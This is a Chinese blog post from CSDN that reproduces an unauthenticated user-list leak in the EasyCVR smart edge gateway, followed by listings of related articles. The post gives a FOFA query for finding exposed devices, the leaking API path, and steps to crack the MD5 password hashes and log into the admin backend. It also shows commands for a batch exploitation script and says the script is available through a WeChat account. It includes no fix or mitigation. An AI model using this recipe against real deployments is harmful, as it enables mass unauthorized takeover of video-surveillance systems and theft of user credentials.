EasyCVR智能边缘网关未授权访问用户信息泄露漏洞

最新推荐文章于 2024-05-15 10:37:11 发布
最新推荐文章于 2024-05-15 10:37:11 发布
阅读量744 收藏 1
点赞数
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CommputerMac/article/details/133697739
版权

一、漏洞描述

EasyCVR智能边缘网关是TSINGSEE青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI智能检测、处理、分发等服务。通过对视频监控场景中的人、车、物等进行AI检测与抓拍,对异常情况进行智能提醒和通知,可广泛应用于安防监控、智能检测、通行核验等场景。

EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。

二、网络空间搜索引擎查询

fofa查询

title="EasyCVR"

三、漏洞复现

poc

或浏览器直接访问路径 /api/v1/userlist?pageindex=0&pagesize=10

然后将md5加密后的密码解密

然后使用上面的Name 值作为用户名登录

四、批量检测与利用

单个检测

 python .\EasyCVR.py -u ip:port

批量检测

 python .\EasyCVR.py -f  filename

关注微信公众号 网络安全透视镜 回复 20231010 获取批量检测利用脚本

为赋新词强说愁
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【1day】复现EasyCVR智能边缘网关 userlist 信息泄漏漏洞
记录并分享学习安全的知识点..
10-04 282
EasyCVR智能边缘网关是一种基于边缘计算和人工智能技术的设备,旨在提供高效的视频监控和智能分析解决方案。它结合了视频监控摄像头、计算能力和网络连接,能够在现场进行视频数据处理和分析,减轻对中心服务器的依赖。EasyCVR智能边缘网关 存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。
视频监控汇聚平台EasyCVR授权访问用户信息泄漏复现 [附POC]
薛定谔嘚喵博客
10-26 327
EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。
【0day漏洞复现】EasyCVR 视频管理平台存在信息泄露漏洞
qq_34780861的博客
05-15 385
EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过泄露的账户密码登录后台,从而进一步攻击。
漏洞复现--EasyCVR智能边缘网关授权访问
qq_53003652的博客
10-10 410
EasyCVR智能边缘网关是TSINGSEE青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI智能检测、处理、分发等服务。该设备userlist接口存在信息泄露,攻击者可获得md5加密后的密码以进行后续测试。–EasyCVR智能边缘网关
EasyCVR视频管理平台 授权访问漏洞复现
10-18 474
EasyCVR是一款智能、全面的安防视频监控平台,由青犀视频的TSINGSEE团队开发和维护。该平台旨在帮助大中型用户实现跨区域网络化视频监控的集中管理,具有信息资源管理、设备管理、用户管理、网络管理以及安全管理等一系列功能。
EasyCVR智能边缘网关用户信息泄漏漏洞
weixin_44304678的博客
11-02 266
EasyCVR智能边缘网关是一种基于边缘计算和人工智能技术的设备,旨在提供高效的视频监控和智能分析解决方案。它结合了视频监控摄像头、计算能力和网络连接,能够在现场进行视频数据处理和分析,减轻对中心服务器的依赖。EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。
【FAQ】安防监控系统/视频云存储EasyCVR平台安全检查Proxy出现sql injection的漏洞,该如何修改?
AI与流媒体视频技术
09-21 119
视频云存储/安防监控EasyCVR视频汇聚平台基于云边端智能协同,支持海量视频的轻量化接入与汇聚、转码与处理、全网智能分发、视频集中存储等。
EasyCVR加密机授权出现报错问题的排查解决及注意事项
EasyCVR视频融合云平台的技术博客
09-13 195
如有用户出现上述同样的情况,可参照该方法进行配置。若有无法解决的问题,可联系我们协助排查。
EasyCVR智能边缘网关+EasyGBS国标云平台助力智慧环保.docx
10-26
一种是当4G硬盘录像机定制WiFi功能时,通过有线方式与EasyCVR智能边缘网关连接,并额外安装4G路由器实现外网连接;另一种则是当4G硬盘录像机已定制WiFi功能时,EasyCVR智能边缘网关也定制WiFi功能,直接通过WiFi...
PLC通讯智能网关边缘计算LUA脚本手册V1.72.pdf
04-06
《IGT-SER系列智能网关边缘计算LUA脚本手册V1.72》是为用户提供的关于PLC通讯智能网关边缘计算的详细指南,由武汉埃和智能科技有限公司编写。本手册旨在帮助产品使用者、现场技术支持、维护人员和系统实施人员理解和...
Panabit智能应用网关用户手册v6.2.1
最新发布
05-28
Panabit智能应用网关用户手册v6.2.1
99-web漏洞挖掘之授权访问漏洞1
08-03
授权访问漏洞】是指那些本应受到安全配置或权限认证保护的系统资源或服务,由于配置不当,允许任何用户经身份验证即可直接访问。这种漏洞可能导致敏感信息泄露、重要功能被恶意操作,严重威胁企业的数据安全。...
Apollo 配置中心授权获取配置漏洞利用-Apollo_unauth.zip
01-31
然而,"Apollo 配置中心授权获取配置漏洞利用"指出,Apollo在某些情况下可能存在安全漏洞,允许授权的用户访问和获取配置信息,这对系统的安全性构成威胁。 该漏洞可能源于Apollo在权限控制上的不足,例如,...
漏洞复现】EasyCVR智能边缘网关用户信息泄漏漏洞
晚风不及你
02-08 809
EasyCVR智能边缘网关是一种基于边缘计算和人工智能技术的设备,旨在提供高效的视频监控和智能分析解决方案。它结合了视频监控摄像头、计算能力和网络连接,能够在现场进行视频数据处理和分析,减轻对中心服务器的依赖。
EasyCVR平台安全扫描提示Go pprof调试信息泄露的解决办法
TSINGSEE青犀视频官方技术博客
07-21 1680
EasyCVR部署简单、兼容性高,平台采用分布式部署,可对外提供统一的API接口,实现连接设备、连接数据、连接应用,便于第三方平台快速集成。
浅谈“授权访问漏洞
热门推荐
→_→
07-26 1万+
一:漏洞名称: 授权访问漏洞 描述: 授权访问漏洞,是在攻击者没有获取到登录权限或授权的情况下,或者不需要输入密码,即可通过直接输入网站控制台主页面地址,或者不允许查看的链接便可进行访问,同时进行操作。 检测条件: 已知Web网站具有登录页面。或者具有不允许访问的目录或功能。 不用登录,可通过链接直接访问用户页面功能。 检测方法: 通过对登录后的页面进行抓包,将抓取到的功能链接,在其他浏览器进行打开, 也可以通过web扫描工具进行扫描,爬虫得到相关地址链接,进.
视频融合平台EasyCVR激活码授权不成功的原因排查与解决
EasyCVR视频融合云平台的技术博客
06-27 112
在平台运行正常,且授权信息准确的条件下,用户若出现授权无效的情况,可以先确认服务器时间是否正确。
EasyCVR 视频管理平台存在信息泄露
holyxp的博客
10-30 401
EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过泄露的账户密码登录后台,从而进一步攻击。
EasyCVR 视频管理平台存在用户信息泄露[附批量POC]
Liyu_6618的博客
02-08 598
EasyCVR 视频管理平台存在用户信息泄露[附批量POC]
2021年AIoT智能边缘计算网关技术规范解读
"2021年AIoT智能边缘计算网关技术规范.pdf" 是一份详细阐述AIoT智能边缘计算网关技术要求的文档,由开放数据中心委员会于2021年9月15日发布。该文档旨在解决在物联网(IoT)和人工智能(AI)结合的端边缘场景下,边缘...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值